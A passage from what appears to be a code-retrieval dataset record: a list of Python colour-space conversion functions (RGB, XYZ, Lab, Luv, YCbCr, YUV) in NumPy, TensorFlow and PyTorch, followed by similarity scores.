http://www.brucelindbloom.com/index.html?Eqn_RGB_XYZ_Matrix.html\n # sRGB, D65\n x = r * 0.4124564 + g * 0.3575761 + b * 0.1804375\n y = r * 0.2126729 + g * 0.7151522 + b * 0.0721750\n z = r * 0.0193339 + g * 0.1191920 + b * 0.9503041\n\n # http://www.brucelindbloom.com/index.html?Eqn_XYZ_to_Lab.html\n kappa, epsilon = 903.3, 0.008856\n\n # http://brucelindbloom.com/index.html?Eqn_ChromAdapt.html\n # White point for D65\n xr, yr, zr = x / 0.95047, y / 1.00000, z / 1.08883\n\n fx = xr ** (1 / 3.0) if xr > epsilon else (kappa * xr + 16) / 116.0\n fy = yr ** (1 / 3.0) if yr > epsilon else (kappa * yr + 16) / 116.0\n fz = zr ** (1 / 3.0) if zr > epsilon else (kappa * zr + 16) / 116.0\n\n l = 166.0 * fy - 16.0\n a = 500.0 * (fx - fy)\n b = 200.0 * (fy - fz)\n\n return l, a, b", "def get_rgb(self, img, r, g, b):\r\n\r\n # Get specific bands of hyperspectral image\r\n red_channel = img[:, :, r]\r\n green_channel = img[:, :, g]\r\n blue_channel = img[:, :, b]\r\n\r\n img = np.stack((red_channel, green_channel, blue_channel), axis=2)\r\n img = img.astype('float32')\r\n return img", "def luv_to_rgb(image: torch.Tensor, eps: float = 1e-12) -> torch.Tensor:\n if not isinstance(image, torch.Tensor):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(image)}\")\n\n if len(image.shape) < 3 or image.shape[-3] != 3:\n raise ValueError(f\"Input size must have a shape of (*, 3, H, W). 
Got {image.shape}\")\n\n L: torch.Tensor = image[..., 0, :, :]\n u: torch.Tensor = image[..., 1, :, :]\n v: torch.Tensor = image[..., 2, :, :]\n\n # Convert from Luv to XYZ\n y: torch.Tensor = torch.where(L > 7.999625, torch.pow((L + 16) / 116, 3.0), L / 903.3)\n\n # Compute white point\n xyz_ref_white: Tuple[float, float, float] = (0.95047, 1.0, 1.08883)\n u_w: float = (4 * xyz_ref_white[0]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n v_w: float = (9 * xyz_ref_white[1]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n\n a: torch.Tensor = u_w + u / (13 * L + eps)\n d: torch.Tensor = v_w + v / (13 * L + eps)\n c: torch.Tensor = 3 * y * (5 * d - 3)\n\n z: torch.Tensor = ((a - 4) * c - 15 * a * d * y) / (12 * d + eps)\n x: torch.Tensor = -(c / (d + eps) + 3.0 * z)\n\n xyz_im: torch.Tensor = torch.stack([x, y, z], -3)\n\n rgbs_im: torch.Tensor = xyz_to_rgb(xyz_im)\n\n # Convert from RGB Linear to sRGB\n rgb_im = linear_rgb_to_rgb(rgbs_im)\n\n return rgb_im", "def sRGBToLab(rgb):\n return xyzToLab(xyzFromsRGB(rgb), [0.9504559, 1, 1.089058])", "def sRGBFromLabD50(lab):\n return xyzTosRGBD50(labToXYZ(lab, [0.9642957, 1, 0.8251046]))", "def xyz_to_rgb(image: tf.Tensor) -> tf.Tensor:\n x, y, z = tf.unstack(image, axis=-1)\n var_x = x / 100\n var_y = y / 100\n var_z = z / 100\n\n var_r = var_x * 3.2406 + var_y * -1.5372 + var_z * -0.4986\n var_g = var_x * -0.9689 + var_y * 1.8758 + var_z * 0.0415\n var_b = var_x * 0.0557 + var_y * -0.2040 + var_z * 1.0570\n\n var_r = tf.where(var_r > 0.0031308,\n 1.055 * tf.pow(var_r, (1 / 2.4)) - 0.055,\n 12.92 * var_r)\n var_g = tf.where(var_g > 0.0031308,\n 1.055 * tf.pow(var_g, (1 / 2.4)) - 0.055,\n 12.92 * var_g)\n var_b = tf.where(var_b > 0.0031308,\n 1.055 * tf.pow(var_b, (1 / 2.4)) - 0.055,\n 12.92 * var_b)\n r = var_r * 255\n g = var_g * 255\n b = var_b * 255\n rgb_image = tf.cast(tf.stack([r, g, b], axis=-1), tf.uint8)\n return rgb_image", "def l_to_rgb(img_l):\n lab = np.squeeze(255 * (img_l + 1) / 2)\n return color.gray2rgb(lab) / 255", "def rgb2alpha(img):\n\t### First of all we need the size of our picture to make the transforms\n\n\tx = len(img) ; y = len(img[0])\n\talpha = np.full((x, y, 3), 0, dtype = float)\t\t## This will be the transformed image\n\n\t### Now we gotta access each pixel of the picture\n\n\tfor i, vi in enumerate(img):\n\t\tfor j, px in enumerate(vi):\n\t\t\t### There we are\n\n\t\t\t# Step 1 : LMS transform, for that we use r_l\n\n\t\t\talpha[i][j] = np.matmul(r_l, px)\n\n\t\t\t# Step 2 : log em all (decimal log)\n\n\t\t\talpha[i][j][0] = log(alpha[i][j][0])\n\t\t\talpha[i][j][1] = log(alpha[i][j][1])\n\t\t\talpha[i][j][2] = log(alpha[i][j][2])\n\n\t\t\t# Step 3 : l alpha beta transform, by using l_a\n\n\t\t\talpha[i][j] = np.matmul(l_a, alpha[i][j])\n\n\treturn alpha", "def rgb_image(self):\n z3 = self.z[:,:,newaxis]\n return z3 * self.c", "def lab_to_xyz(image: tf.Tensor) -> tf.Tensor:\n l, a, b = tf.unstack(image, axis=-1)\n\n var_y = (l + 16) / 116\n var_x = a / 500 + var_y\n var_z = var_y - b / 200\n var_x = tf.where(tf.pow(var_x, 3) > 0.008856, tf.pow(var_x, 3),\n (var_x - 16 / 116) / 7.787)\n var_y = tf.where(tf.pow(var_y, 3) > 0.008856, tf.pow(var_y, 3),\n (var_y - 16 / 116) / 7.787)\n var_z = tf.where(tf.pow(var_z, 3) > 0.008856, tf.pow(var_z, 3),\n (var_z - 16 / 116) / 7.787)\n\n refx = 95.047\n refy = 100.00\n ref_z = 108.883\n\n x = var_x * refx\n y = var_y * refy\n z = var_z * ref_z\n xyz_image = tf.stack([x, y, z], axis=-1)\n return xyz_image", "def convert_color(image, 
color_space):\n out_image = None\n if color_space != 'RGB':\n if color_space == 'HSV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YCrCb)\n else:\n out_image = np.copy(image)\n return out_image", "def rgb_to_xyz(image: tf.Tensor) -> tf.Tensor:\n r, g, b = tf.unstack(image, axis=-1)\n var_r = r / 255\n var_g = g / 255\n var_b = b / 255\n\n var_r = tf.where(var_r > 0.04045, tf.pow((var_r + 0.055) / 1.055, 2.4),\n var_r / 12.92)\n var_g = tf.where(var_g > 0.04045, tf.pow((var_g + 0.055) / 1.055, 2.4),\n var_g / 12.92)\n var_b = tf.where(var_b > 0.04045, tf.pow((var_b + 0.055) / 1.055, 2.4),\n var_b / 12.92)\n var_r = var_r * 100\n var_g = var_g * 100\n var_b = var_b * 100\n\n x = var_r * 0.4124 + var_g * 0.3576 + var_b * 0.1805\n y = var_r * 0.2126 + var_g * 0.7152 + var_b * 0.0722\n z = var_r * 0.0193 + var_g * 0.1192 + var_b * 0.9505\n\n image_xyz = tf.stack([x, y, z], axis=-1)\n return image_xyz", "def rgb_processing(rgb_img, center, scale, rot=0):\n rgb_img = crop(rgb_img, center, scale, \n [constants.IMG_RES, constants.IMG_RES], rot=rot)\n # (3,224,224),float,[0,1]\n rgb_img = np.transpose(rgb_img.astype('float32'),(2,0,1))/255.0\n return rgb_img", "def _convert_to_yolo_img(self, img):\n\n img = img / 255.0\n h, w, c = img.shape\n img = img.transpose(2, 0, 1)\n outimg = make_image(w, h, c)\n img = img.reshape((w*h*c))\n data = c_array(c_float, img)\n outimg.data = data\n rgbgr_image(outimg)\n return outimg", "def matplotlib_image(image):\n if image.ndim == 2:\n rgb = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n else:\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return rgb", "def red_channel(img):\n\n red = np.zeros(img.shape,dtype=float)\n\n red[:,:,2] = np.copy(img[:,:,2])\n\n return red", "def ycbcr_to_rgb(image: torch.Tensor) -> torch.Tensor:\n y: torch.Tensor = image[..., 0, :, :]\n cb: torch.Tensor = image[..., 1, :, :]\n cr: torch.Tensor = image[..., 2, :, :]\n\n delta: float = 0.5\n cb_shifted: torch.Tensor = cb - delta\n cr_shifted: torch.Tensor = cr - delta\n\n r: torch.Tensor = y + 1.403 * cr_shifted\n g: torch.Tensor = y - 0.714 * cr_shifted - 0.344 * cb_shifted\n b: torch.Tensor = y + 1.773 * cb_shifted\n return torch.stack([r, g, b], -3)", "def yuv2rgb(im):\n ## conflicting definitions exist depending on whether you use the full range\n ## of YCbCr or clamp out to the valid range. see here\n ## http://www.equasys.de/colorconversion.html\n ## http://www.fourcc.org/fccyvrgb.php\n from numpy import dot, ndarray, array\n # if not im.dtype == 'uint8':\n # raise ImageUtilsError('yuv2rgb only implemented for uint8 arrays')\n\n ## better clip input to the valid range just to be on the safe side\n yuv = ndarray(im.shape) ## float64\n yuv[:, :, 0] = im[:, :, 0].clip(16, 235).astype(yuv.dtype) - 16\n yuv[:, :, 1:] = im[:, :, 1:].clip(16, 240).astype(yuv.dtype) - 128\n\n ## ITU-R BT.601 version (SDTV)\n A = array([[1., 0., 0.701],\n [1., -0.886 * 0.114 / 0.587, -0.701 * 0.299 / 0.587],\n [1., 0.886, 0.]])\n A[:, 0] *= 255. / 219.\n A[:, 1:] *= 255. 
/ 112.\n\n ## ITU-R BT.709 version (HDTV)\n # A = array([[1.164, 0., 1.793],\n # [1.164, -0.213, -0.533],\n # [1.164, 2.112, 0.]])\n\n rgb = dot(yuv, A.T)\n return rgb.clip(0, 255).astype('uint8')", "def example_lab_to_xyz():\r\n\r\n print(\"=== Simple Example: Lab->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n lab = LabColor(0.903, 16.296, -2.22)\r\n # Show a string representation.\r\n print(lab)\r\n # Convert to XYZ.\r\n xyz = convert_color(lab, XYZColor)\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def grey_to_rgb_imitation(img):\n return np.repeat(img[...,np.newaxis], 3, -1)" ]
[ "0.7471666", "0.7259688", "0.7216436", "0.6839209", "0.6759264", "0.67525685", "0.67007047", "0.6603421", "0.6600922", "0.6595562", "0.6580605", "0.6568346", "0.6499439", "0.64541537", "0.64526325", "0.6431422", "0.63929", "0.6372881", "0.63197166", "0.6308842", "0.63075536", "0.62842566", "0.6284198", "0.62655497", "0.6263118", "0.6215577", "0.6208403", "0.6144289", "0.6131233", "0.6115102" ]
0.7765698
0
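A hedged round-trip sketch for the lab_to_rgb document above, assuming rgb_to_lab from the previous record is also in scope (TensorFlow 2.x; small errors are expected because the xyz_to_rgb step quantizes back to uint8):

import tensorflow as tf

img = tf.constant([[[120.0, 130.0, 140.0]]])
restored = lab_to_rgb(rgb_to_lab(img))
# Should reproduce the input up to rounding from the uint8 cast.
print(restored.numpy())  # approximately [[[120, 130, 140]]]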
Checks if the given character is a letter.
def is_letter(c): return 'A' <= c <= 'Z' or 'a' <= c <= 'z'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_letter(string_):\n if string_ not in string.ascii_letters or len(string_) > 1:\n return False\n return True", "def isLetter(c):\n ret = libxml2mod.xmlIsLetter(c)\n return ret", "def is_letter(user_input):\n # If any characters is letter -> return boolean True else False\n if any(char.isalpha() for char in user_input):\n return True\n return False", "def has_letter(word):\r\n for char in word:\r\n if char.isalpha():\r\n return True\r\n return False", "def __valid_char(self, char: str) -> bool:\r\n if char.isdigit():\r\n raise ValueError('Characters can\\'t be numbers')\r\n\r\n return char.isalpha() or char.isspace()", "def character(x):\n if (x==\"a\"or x==\"A\"or x==\"e\"or x==\"E\"or x==\"i\"or x==\"I\"or x==\"o\"or x==\"O\"or x==\"u\"or x==\"U\"):\n return('True')\n else:\n return('False')", "def isSingleLetter(self, word):\n return (re.match('^\\w$', word)) != None", "def is_lowercase(character):\n return 'a' <= character <= 'z'", "def isalpha(self) -> bool:\n pass", "def is_uppercase(character):\n return 'A' <= character <= 'Z'", "def isChar(ch):\n ret = libxml2mod.xmlIsChar(ch)\n return ret", "def is_allowed_char(ch):\n\treturn ch.isalnum() or ch in \"#.>+*:$-_!@\"", "def isAlpha(string):\n return (True)", "def is_valid_input(guess_letter):\r\n length = len(guess_letter)\r\n\r\n if length > 1 and not guess_letter.isalpha():\r\n return False\r\n elif not guess_letter.isalpha():\r\n return False\r\n elif length > 1:\r\n return False\r\n else:\r\n return True", "def test_starts_letter(x):\n return x[0].isalpha()", "def is_valid_char(src):\n\n return src.isalnum()", "def must_contain_letter(cell):\n # Check if it's nan first\n if check_empty(cell):\n return True\n return not bool(re.search(\"[a-zA-Z]\", str(cell)))", "def isAlphanum(c):\r\n return ((c >= 'a' and c <= 'z') or (c >= '0' and c <= '9') or\r\n (c >= 'A' and c <= 'Z') or c == '_' or c == '$' or c == '\\\\' or (c is not None and ord(c) > 126));", "def ishex(char: chr) -> bool:\n return char.isdigit() or char in \"abcdef\"", "def _is_alpha(argument):\n\n if not isinstance(argument, str):\n return False\n\n if argument.lower() == 'alpha':\n is_alpha = True\n else:\n argument, Z = _extract_charge_state(argument)\n\n if Z != 2:\n is_alpha = False\n elif argument[-2:] != '-4':\n is_alpha = False\n else:\n\n dash_position = argument.find('-')\n argument = argument[:dash_position]\n\n if argument.lower() == 'helium' or argument == 'He':\n is_alpha = True\n else:\n is_alpha = False\n\n return is_alpha", "def if_letter(letter):\r\n str_abc= ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\r\n answer= False\r\n for i in range(len(str_abc)):\r\n if letter==str_abc[i]:\r\n answer=True\r\n return answer", "def isalpha(self):\n return isalpha(self)", "def is_word_character(ch):\n if (ch >= 'a' and ch <= 'z'): return True\n if (ch >= 'A' and ch <= 'Z'): return True\n if (ch >= '0' and ch <= '9'): return True\n if (ch >= 'À' and ch < 'ˀ'): return True\n if (ch == '-' or ch == '0xAD'): return True # hyphen or soft hyphen\n if (ch >= 'Ά' and ch <= 'ԓ'): return True\n return False", "def check_type(character: str):\n if character.isupper():\n return 'upper'\n elif character.islower():\n return 'lower'\n elif character.isspace():\n return 'space'\n elif character in string.punctuation:\n return 'punc'\n else:\n return 'digit'", "def check_type(character: str):\n if character.isupper():\n return 'upper'\n elif character.islower():\n return 'lower'\n elif character.isspace():\n return 
'space'\n elif character in string.punctuation:\n return 'punc'\n else:\n return 'digit'", "def is_valid_alphabetical_string(string_object: str):\n return string_object.isalpha()", "def checkLetter():\n\tguess = False\n\twhile guess != True:\n\t\tguess = str(raw_input(\"Guess a letter: \"))\n\t\tif guess.isalpha() and len(guess) == 1 :\n\t\t\treturn guess\n\t\telif not guess.isalpha() or len(guess) > 1:\n\t\t\tprint \"The input may be one letter only!\"\n\t\telse:\n\t\t\tprint \"Error in checkLetter\"", "def test_ends_letter(x):\n return x[-1].isalpha()", "def contains_only_char(s, char):\n for c in s:\n if c != char:\n return False\n return True", "def name_valid(name):\n return name.isalpha()" ]
[ "0.8101875", "0.7942589", "0.77772945", "0.7760421", "0.7488684", "0.7349609", "0.7162389", "0.7131679", "0.7119435", "0.71050584", "0.7094554", "0.70823413", "0.70609343", "0.7013201", "0.69936603", "0.69796395", "0.6963873", "0.6928611", "0.6889942", "0.68720996", "0.68349135", "0.68182826", "0.6767468", "0.67518854", "0.6746451", "0.6743348", "0.6732877", "0.66436744", "0.66269696", "0.6549778" ]
0.84225947
0
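A short usage note for the is_letter document above: unlike str.isalpha() it accepts only the 26 ASCII letters, and it is meant for single characters (chained comparisons on longer strings compare lexicographically):

assert is_letter('a') and is_letter('Z')
assert not is_letter('5') and not is_letter('_')
assert not is_letter('é')  # non-ASCII letters are rejected, although 'é'.isalpha() is True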
Checks if the given character is a number.
def is_number(c): return '0' <= c <= '9'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_num_char(x):\n return ord('0') <= ord(x) <= ord('9')", "def is_number_char(c: str) -> bool:\n return c.isdigit() or c == \".\"", "def is_number(s):\r\n try:\r\n int(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(s):\n try:\n int(s)\n return True\n except ValueError:\n return False", "def isnum(self, x):\n\n return x in '1234567890.-'", "def isnumber(n):\r\n N = str(n)\r\n if N.isdigit():\r\n return True\r\n else:\r\n return False", "def isNumber(string):\r\n for char in string:\r\n charNum = ord(char)\r\n if (charNum < 48 or charNum > 57):\r\n return False\r\n return True", "def _is_number(self, symbol):\n if symbol.type == self.scanner.NUMBER:\n return True\n else:\n return False", "def is_valid_numeric(inString):\r\n return is_int(inString) or is_float(inString)", "def is_number_repl_isnumeric(s):\n return s.replace('.', '', 1).isnumeric()", "def is_num(var):\n try:\n int(var)\n return True\n except ValueError:\n return False", "def isnumeric(number):\n try:\n float(number)\n return True\n except (TypeError, ValueError):\n return False", "def is_number(value):\n try:\n int(value)\n return True\n except (ValueError, TypeError):\n return False", "def isdigit(self):\n return isdigit(self)", "def isDigit(ch):\n ret = libxml2mod.xmlIsDigit(ch)\n return ret", "def string_is_digit(string):\n valids = set([46, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57])\n plus_minus = set([43, 45])\n characters = list(string)\n\n #First character can be number or +/-\n if ord(characters[0]) not in valids.union(plus_minus):\n return False\n \n #Iterate to check all other characters\n for character in string[1:]:\n value = ord(character)\n if value not in valids:\n return False\n elif value == 46: # 46 = '.'\n valids.remove(46) # Only one period allowed\n return True", "def isdigit(self) -> bool:\n pass", "def IsNumeric(text):\n try:\n _ = float(text)\n except ValueError:\n return 0\n else:\n return 1", "def is_numeric(val):\n if \\\n isinstance(val, int) or \\\n isinstance(val, float):\n return True\n elif \\\n isinstance(val, str) and \\\n val.isdigit():\n return True\n else:\n return False", "def __has_numbers(self, input_string):\n return bool(re.search(r'\\d', input_string))", "def is_number_repl_isdigit(s):\n return s.replace('.', '', 1).isdigit()", "def is_number(s):\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(string):\r\n try:\r\n float(string)\r\n return True\r\n except ValueError: return False", "def is_number(str):\n try:\n float(str)\n return True\n except ValueError as e:\n print(e)\n try:\n unicodedata.numeric(str)\n return True\n except (TypeError, ValueError) as e:\n print(e)\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def isNumber(word):\n try:\n int(word)\n return True\n except ValueError:\n return False" ]
[ "0.8297935", "0.80840826", "0.7704204", "0.76546836", "0.75744826", "0.7568717", "0.7393754", "0.73098946", "0.7302559", "0.7258665", "0.72420657", "0.7230359", "0.7195663", "0.71815383", "0.7179277", "0.7152408", "0.71477836", "0.71332264", "0.71325856", "0.71297145", "0.7120026", "0.7101", "0.71002775", "0.7066229", "0.70618486", "0.703624", "0.703624", "0.703624", "0.7029543", "0.69642216" ]
0.82398206
1
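A short usage note for the is_number document above: it tests a single ASCII digit, so it is narrower than str.isdigit(), and callers should pass exactly one character:

assert is_number('0') and is_number('9')
assert not is_number('a')
# Caveat: '0' <= '42' <= '9' compares lexicographically, so is_number('42')
# happens to return True; the function is only meaningful for single characters.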
Checks whether the given nametag is valid: it may only contain letters, numbers, dashes, underscores and apostrophes, and it must begin and end with the tags defined in `Tags.py`. Returns the nametag if it is valid.
def get_nametag(nametag):
    # start must be valid
    if not nametag.startswith(Tags.NAMETAG_START.value):
        return None
    # removes the start of the tag
    nametag = nametag[len(Tags.NAMETAG_START.value):]
    # end must be valid
    if not nametag.endswith(Tags.NAMETAG_END.value):
        return None
    # removes the end of the tag
    nametag = nametag[:(len(nametag) - len(Tags.NAMETAG_END.value))]
    # no empty nametags
    if nametag == "":
        return None
    # checks that every single character is valid
    for c in nametag:
        if (not is_letter(c) and not is_number(c)
                and c != "-" and c != "_" and c != "'"):
            return None
    return nametag
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def isValidTagName(s):\n if s.lower().startswith(\"xml\"):\n return False\n return re.match(\"[^\\W\\d][\\w\\-_.]*\", s)", "def name_valid(name):\n return name.isalpha()", "def validname(name):\r\n return len(name)>0 and (\r\n Context.__invalid_character.search(name) is None)", "def validName(varname):\r\n if (len(varname[0])>32):\r\n return False\r\n if not(varname[0][0].isalpha()):\r\n return False \r\n for ch in varname[0][1:]:\r\n if not(ch.isalpha() or ch.isdigit() or ch=='_'):\r\n return False\r\n \r\n return True", "def invalid_name(name):\n if any(not item.isalpha() for item in str(name)):\n return True\n return False", "def validate_name(name:str) -> bool:\r\n return name.isalpha() and name.count(\" \") == 0 and len(name) >= 2", "def validate_names(name):\n return isinstance(name, str) and not re.search(r'[\\s]', name)", "def _is_valid_varname(self, name):\n if name in RESERVED or re.match(r'^str([0-9]+|L)$', name): return False\n return True if VALID_NAME_RE.match(name) else False", "def _is_valid_varname(self, name):\n if name in RESERVED or re.match(r'^str[0-9]+$', name): return False\n return True if VALID_NAME_RE.match(name) else False", "def validate_name(self, name):\n import re\n\n if not re.findall(\"^[\\w',]+$\", name):\n self.msg(\"That category name contains invalid characters.\")\n return False\n return True", "def validateName(name):\r\n if not name:\r\n raise IllegalName('Name can not be an empty string.')\r\n\r\n m = _NAME_RE.match(name)\r\n\r\n if m is None or m.group(0) != name:\r\n raise IllegalName('Name has to start with a letter followed by an '\r\n 'arbitrary number of alphanumeric characters or '\r\n 'underscores.')", "def _clean_tag(name):\n # In the past, the first argument to summary ops was a tag, which allowed\n # arbitrary characters. Now we are changing the first argument to be the node\n # name. 
This has a number of advantages (users of summary ops now can\n # take advantage of the tf name scope system) but risks breaking existing\n # usage, because a much smaller set of characters are allowed in node names.\n # This function replaces all illegal characters with _s, and logs a warning.\n # It also strips leading slashes from the name.\n if name is not None:\n new_name = _INVALID_TAG_CHARACTERS.sub('_', name)\n new_name = new_name.lstrip('/') # Remove leading slashes\n if new_name != name:\n logging.warning('Summary name %s is illegal; using %s instead.', name, new_name)\n name = new_name\n return name", "def _check_is_name_valid(self, name):\n if name in self.forbidden_names or name.endswith(\n self.forbidden_extensions) or self.__check_is_match_regex(name):\n return False\n return True", "def IsVPCNameValid(vpc):\n if len(vpc) < 1 or len(vpc) > 63:\n return False\n return bool(re.match('^[a-z]$|^[a-z][a-z0-9-]*[a-z0-9]$', vpc))", "def validate_name(name):\n name = name.strip()\n m = re.search('^[a-zA-Z0-9 ]{3,30}$', name)\n if m is None:\n return False\n else:\n return True", "def CHECK_NAME(name):\n if WORDPAT.match(name):\n return name\n return None", "def _filter_name(name):\n # Remove if length 3 or less\n if len(name) <= 3:\n return False\n # Remove if starts with IL-\n if name.startswith('IL-'):\n return False\n lowname = name.lower()\n # Remove if contains certain sequences\n if any(c in lowname for c in STOP_SUB):\n return False\n # Remove if (case-insensitive) exact match to stoplist\n if lowname in STOPLIST:\n return False\n comps = re.split('[ -]', lowname)\n # Remove if just single character + digits separated by spaces or hyphens (or the word compound)\n if all(c.isdigit() or len(c) == 1 or c == 'compound' for c in comps):\n return False\n # Remove if 3 or fewer letters with 2 or fewer digits\n if len(comps) == 2 and len(comps[0]) <= 3 and comps[0].isalpha() and len(comps[1]) <= 3 and comps[1].isdigit():\n return False\n # Remove if just greek characters and numbrs\n if re.match('^[Α-Ωα-ω0-9]+$', name):\n return False\n # Filter registry numbers? 
No real size benefit in DAWG.\n # if REG_RE.search(name):\n # keep = False\n # Handle this at the token level\n # if name.endswith(' derivative') or name.endswith(' analog') or name.endswith(' solution'):\n # keep = False\n # Filter this after matching and expanding boundaries\n # if name.startswith('-') or name.endswith('-'):\n # keep = False\n # Filter this after matching and expanding boundaries\n # if not bracket_level(name) == 0:\n # print(name)\n return True", "def test_invalid_as_name(self):\n\n def make_bad_tag():\n class BadTag(ttag.helpers.AsTag):\n as_ = ttag.Arg(named=True)\n\n self.assertRaises(template.TemplateSyntaxError, make_bad_tag)", "def MakeValidName(name):\n if name:\n goodName = []\n if not xml.is_name_start_char(name[0]):\n goodName.append(u'_')\n for c in name:\n if xml.is_name_char(c):\n goodName.append(c)\n else:\n goodName.append(u'_')\n return string.join(goodName, u'')\n else:\n return u'_'", "def check_valid_key_name(name):\n if type(name) not in [str]:\n return False\n bad_chars = [\"*\", \".\", \"&&&&\"]\n for k in bad_chars:\n if k in name:\n return False\n return True", "def match(self, name, tags):\n return name.lower() in tags", "def validated_name(cls, name):\n if (name[:5] == 'hive-'\n and name[5] in ['1', '2', '3']\n and re.match(r'^hive-[123]\\d{4,6}$', name)):\n return name\n return None", "def isValidPart(name):\n\tfor n in name_forms:\n\t\tif re.match(n, name.lower()) is not None:\n\t\t\treturn True\n\treturn False", "def legal_name(name, is_param_name=False):\n if name.startswith('_'):\n return False\n\n if name in ('self',):\n return False\n\n if keyword.iskeyword(name):\n return False\n\n regex = r'^[a-zA-Z][a-zA-Z0-9_]*$' if is_param_name else (\n r'^[a-zA-Z][.\\w-]*$')\n return bool(re.match(regex, name))", "def validate_team_name(name):\n if not re.match('^[A-Za-z0-9_]*$', name):\n print('INVALID NAME. LETTERS, NUMBERS AND UNDERSCORES ONLY')\n return False\n elif len(name) > 10:\n print('INVALID NAME. 10 CHARACTERS MAX')\n return False\n elif len(name) == 0:\n print('INVALID NAME. NOT LONG ENOUGH')\n else:\n return True", "def check_name(name):\n name = sanitize_name(name)\n for letter in name:\n if letter not in all_letters:\n # print(f\"Bad letter = {letter}\")\n return False\n role = extract_role(name)\n # remove group\n name = name.replace(f' - {role}', '')\n try:\n parts = name.split(' ')\n firstname = parts[0].title()\n if firstname[0] not in letters:\n return False\n for letter in firstname[1:]:\n if letter not in LETTERS:\n return False\n familynames = parts[1:]\n for familyname in familynames:\n if familyname[0] not in letters:\n return False\n for letter in familyname[1:]:\n if letter not in LETTERS:\n return False\n return True\n except:\n return False", "def clean_name(self):\n name = self.cleaned_data['name']\n if not re.match(r'[\\w{4}\\s*]+', name) or len(name) < 4:\n v_err('no_name')\n return name", "def validate_tag(tag=None):\n if not tag:\n raise AttributeError('Tag cannot be empty')\n\n if tag not in TAGS:\n raise ValueError('{0} tag is not supported')", "def isValidName(theString, minimum, maximum) :\n\n return theString.isalpha() == True \\\n and len(theString) >= minimum \\\n and len(theString) <= maximum", "def is_real_name(name):\n return name.strip(\"<> \") in names_set" ]
[ "0.7056981", "0.6984154", "0.6797562", "0.65576094", "0.65357757", "0.6507386", "0.6452223", "0.63574183", "0.6310293", "0.6288627", "0.62855893", "0.6240301", "0.62214375", "0.61912215", "0.6171858", "0.615459", "0.61444604", "0.6139254", "0.6049716", "0.6022824", "0.59896547", "0.5982377", "0.5968032", "0.5958874", "0.5951548", "0.59489644", "0.59308624", "0.59254557", "0.5904121", "0.5901528" ]
0.7059107
0
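The `get_nametag` document above depends on a `Tags` enum and `is_letter`/`is_number` helpers that are defined elsewhere in its project and are not part of the record. A minimal sketch showing how it might be exercised — the tag values below are assumptions chosen only to make the example self-contained:

```python
from enum import Enum

class Tags(Enum):      # hypothetical stand-in for the project's Tags.py
    NAMETAG_START = "["
    NAMETAG_END = "]"

def is_letter(c):      # assumed helper
    return c.isalpha()

def is_number(c):      # assumed helper
    return c.isdigit()

# With these definitions in scope:
#   get_nametag("[alice_o'neill]") -> "alice_o'neill"
#   get_nametag("[bad tag]")       -> None  (space is not an allowed character)
#   get_nametag("alice]")          -> None  (missing start tag)
#   get_nametag("[]")              -> None  (empty nametags are rejected)
```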
Checks whether the given nametag is reachable from another branch. This means that the given nametag must appear as an end tag in at least one branch.
def is_nametag_reachable(nametag, branches): for branch in branches: for next_nametag in branches[branch].next_nametags: if next_nametag == nametag: return True return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def valid_branches(branches):\n\n # for every branch in the list\n for branch in branches:\n\n # make sure it is either reachable or has the special tag \"start\"\n if branches[branch].name != \"start\" and not is_nametag_reachable(branches[branch].name, branches):\n return False\n\n # make sure all ending tags refer to existing branches\n for nametag in branches[branch].next_nametags:\n if not branch_exists(nametag, branches):\n return False\n\n return True", "def branch_exists(nametag, branches):\n for branch in branches:\n if branches[branch].name == nametag:\n return True\n return False", "def _is_branch(self, reference_name):\n return reference_name.startswith(\"refs/heads/\") or reference_name.startswith(\n \"refs/remotes/\"\n )", "def is_branch(wit_path, branch):\n\n branches = _get_references_data(wit_path)\n del branches['HEAD']\n return branch in branches.keys()", "def branch(name, wit_path):\n\n if name != 'None':\n\n if len(name) < 30:\n head = _get_head(wit_path)\n _add_branch(wit_path, name, head)\n else:\n logging.error(f'branch name is too long \"{name}\" (max 30 digits).')\n else:\n logging.error(f'branch name is not valid {name}.')", "def branch_exists(branch_name, local_only=False, directory=None):\n for branch in get_branches(local_only, directory):\n if branch.startswith('remotes/'):\n branch = branch.split('/')\n if len(branch) > 2:\n branch = '/'.join(branch[2:])\n if branch_name == branch:\n return True\n else:\n if branch_name == branch:\n return True\n return False", "def has_branch(self, branch):\n if self.branch == branch:\n return True\n return False", "def match(self, name, tags):\n return name.lower() in tags", "def is_tagged(self,tag_name,element):\n return (tag_name in self.tag2elements.keys()) and (element in self.tag2elements[tag_name])", "def check_component(comp_name: str, comp: defs.Component) -> None:\n if not 